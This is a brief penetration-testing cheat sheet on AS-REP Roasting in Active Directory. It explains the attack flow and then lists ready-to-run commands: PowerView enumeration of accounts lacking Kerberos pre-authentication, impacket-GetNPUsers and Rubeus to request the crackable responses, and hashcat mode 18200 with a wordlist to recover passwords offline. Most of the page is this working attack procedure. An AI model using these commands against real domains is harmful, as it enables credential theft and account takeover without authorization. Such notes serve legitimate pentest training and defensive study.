AS-REP Roasting

Introduction

AS-REP Roasting targets Active Directory accounts without Kerberos Pre-authentication.

The attack is made in few steps:

Attacker sends AS-REQ request in order to get TGT from the Authentication Server for target user without using pre-authentication.
Authentication Server sends encrypted TGT to the attacker.
Attacker brute-forces the TGT offline to obtain the user's password.

Enumerating accounts with Kerberos pre-authentication disabled from inside the network.

Get-DomainUser -PreauthNotRequired -Verbose

unauthenticated:

impacket-GetNPUsers <domain_name>/ -no-pass -dc-ip <dc_ip> -usersfile <userslist_file> -outputfile <hashes_file>

Authenticated

impacket-GetNPUsers -dc-ip <dc_ip> -request -outputfile <hashes_file> <domain>/<username>

.\Rubeus.exe asreproast /nowrap

hashcat -m 18200 <hashes> /usr/share/wordlists/rockyou.txt

Last updated 1 year ago